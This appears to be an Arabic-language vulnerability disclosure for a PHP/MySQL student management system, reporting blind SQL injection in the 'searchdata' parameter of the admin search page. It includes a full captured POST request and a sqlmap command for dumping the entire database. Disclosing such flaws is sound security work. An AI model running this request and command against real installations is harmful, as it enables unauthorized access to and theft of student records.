
نظام إدارة الطلاب باستخدام PHP وMySQL
نظام إدارة الطلاب (SMS) هو تطبيق ويب تم تطويره باستخدام PHP وMySQL لإدارة معلومات الطلاب. يحتوي هذا المستودع على الكود المصدري وتفاصيل النظام، بالإضافة إلى تقرير ثغرة أمنية.
المدقق:
شعيب علام - ملف لينكد إن
تم اكتشاف ثغرة حقن SQL أعمى في نظام إدارة الطلاب. تؤثر هذه المشكلة على المعامل searchdata في وظيفة البحث في التطبيق.
/studentms/admin/search.phpsearchdataالمعامل searchdata عرضة لحقن SQL الأعمى بسبب عدم تنقية المدخلات بشكل كافٍ. قد يستغل المهاجم هذه الثغرة عن طريق حقن استعلامات SQL ضارة في إدخال searchdata، مما قد يسمح له بالوصول غير المصرح به إلى قاعدة البيانات أو معلومات حساسة أخرى.
/studentms/admin/search.php
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
searchdata=*&search=
احفظ طلب POST أعلاه في ملف req.txt باستخدام المفكرة أو أي محرر نصوص.
استخدم أداة مثل SQLMAP لاستغلال ما سبق بتطبيق الأمر التالي (يمكنك تخصيصه): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3
سيقوم الأمر أعلاه بتفريغ قاعدة البيانات بأكملها لتطبيق الويب.